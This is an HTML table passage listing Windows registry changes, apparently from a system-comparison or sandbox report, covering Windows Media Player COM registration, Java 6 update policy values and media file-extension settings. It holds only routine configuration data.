<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\User Trusted External Applications</span></td>
<td><span style="color: black; font-size: xx-small;">C:\PROGRA~1\WINDOW~2\wmplayer.exe</span></td>
<td><span style="color: black; font-size: xx-small;">"Yes"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\User Trusted External Applications</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Program Files\Windows Media Player\wmplayer.exe"</span></td>
<td><span style="color: black; font-size: xx-small;">"Yes"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\User Trusted External Applications</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Windows Media Player\wmplayer.exe</span></td>
<td><span style="color: black; font-size: xx-small;">"Yes"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\SessionInformation</span></td>
<td><span style="color: black; font-size: xx-small;">ProgramCount</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000005</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Media Player"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand\CLSID</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand\CLSID</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand.1</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand.1</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Media Player"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand.1\CLSID</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DeskBand.1\CLSID</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Media Player"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories\{00021492-0000-0000-C000-000000000046}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\PROGRA~1\WINDOW~2\wmpband.dll"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32</span></td>
<td><span style="color: black; font-size: xx-small;">ThreadingModel</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Apartment"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WMP.DeskBand.1"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WMP.DeskBand"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"IWMPDeskBand"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{00020424-0000-0000-C000-000000000046}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{00020424-0000-0000-C000-000000000046}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib</span></td>
<td><span style="color: black; font-size: xx-small;">Version</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"1.0"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-wmplayer</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-wmplayer</span></td>
<td><span style="color: black; font-size: xx-small;">CLSID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{cd3afa96-b84f-48f0-9393-7edc34128127}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WMPDeskBand 1.0 Type Library"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\PROGRA~1\WINDOW~2\wmpband.dll"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"0"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\PROGRA~1\WINDOW~2\"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">PostStatusUrl</span></td>
<td><span style="color: black; font-size: xx-small;">"https://sjremetrics.java.com/b/ss//6"</span></td>
<td><span style="color: black; font-size: xx-small;">"https://nometrics.java.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateSchedule</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000011</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">Frequency</span></td>
<td><span style="color: black; font-size: xx-small;">dword:01184000</span></td>
<td><span style="color: black; font-size: xx-small;">dword:01020800</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateMin</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000024</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000019</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">ScheduleId</span></td>
<td><span style="color: black; font-size: xx-small;">"S-1-5"</span></td>
<td><span style="color: black; font-size: xx-small;">"S-1-5-21-484763869-706699826-1060284298"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">Method</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"jau"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateBeginTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:09 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">LastUDCheckTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:11 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">VersionXmlChecksum</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"5d18fd23851119c46b57669867f4c625390fbed3"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">LocalFileName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://javadl.sun.com/webapps/download/GetFile/1.6.0_35-b10/windows-i586/jre-6u35-windows-i586-iftw.exe"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">InstallOptions</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"/installmethod=jau SP1OFF=1 SP2OFF=1 SP3OFF=1 SP4OFF=1 SP5OFF=1 SP6OFF=1 SP7OFF=1 SP8OFF=1 SP9OFF=1 SP10OFF=1 SP13OFF=1 SP15OFF=1 MSDIR=ms5 SPWEB=http://javadl-esd.sun.com/update/1.6.0/sp-1.6.0_35-b10 "</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateDescription</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Java 6 Update 35 is ready to install. Click the Install button to update Java now. If you wish to update Java later, click the Later button."</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateMoreInfoUrl</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://java.com/infourl"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">BalloonTitle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Java Update Available"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">BalloonTip</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"A new version of Java is ready to be installed."</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateTitle1</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Java Update Available"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">DlgCaption</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Java Update - Update Available"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">MoreInfoTxt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"More information..."</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">InstalledJREVersion</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"1.6.0_29"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">NewJREVersion</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"1.6.0_35-b10"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">PreDownldStatus</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000012</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">UpdAvailNotifyCnt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">UpdAvailNotifyTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0005b708</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG</span></td>
<td><span style="color: black; font-size: xx-small;">Seed</span></td>
<td><span style="color: black; font-size: xx-small;">hex:4b,98,83,aa,b8,84,79,15,5c,f2,41,1f,58,85,65,dd,da,5c,10,c2,4e,97,fc,bf,e8,02,7d,2b,ed,20,24,e6,85,25,90,84,33,a2,48,95,15,19,e3,f4,07,47,a0,41,ec,7e,cf,61,a2,75,19,7b,6b,a2,ae,e4,a9,bf,61,25,52,78,04,ec,79,60,0b,aa,16,2c,27,b2,57,0c,07,d3,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:16,65,03,44,e9,42,2e,8c,1e,62,1e,55,0f,02,89,7c,f7,5e,b9,12,35,f2,e2,4e,11,4f,f9,2d,0e,e0,2f,84,b3,3f,c7,17,21,5e,93,05,75,47,43,84,ad,c6,5b,e5,d7,2e,5b,88,01,a3,6d,02,2b,79,e5,71,63,a7,e2,41,0d,ad,04,59,53,1c,07,1f,27,3a,bc,b0,2d,6d,0f,6a,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication</span></td>
<td><span style="color: black; font-size: xx-small;">Name</span></td>
<td><span style="color: black; font-size: xx-small;">"mshta.exe"</span></td>
<td><span style="color: black; font-size: xx-small;">"wmplayer.exe"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication</span></td>
<td><span style="color: black; font-size: xx-small;">ID</span></td>
<td><span style="color: black; font-size: xx-small;">dword:49b3ac74</span></td>
<td><span style="color: black; font-size: xx-small;">dword:48025cf1</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">MyPlayLists</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Devices\AudioCD</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.aif</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.aifc</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.aiff</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.asf</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.asx</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.au</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.avi</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.cda</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.dvr-ms</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.m1v</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.m3u</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mid</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.midi</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mp2</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
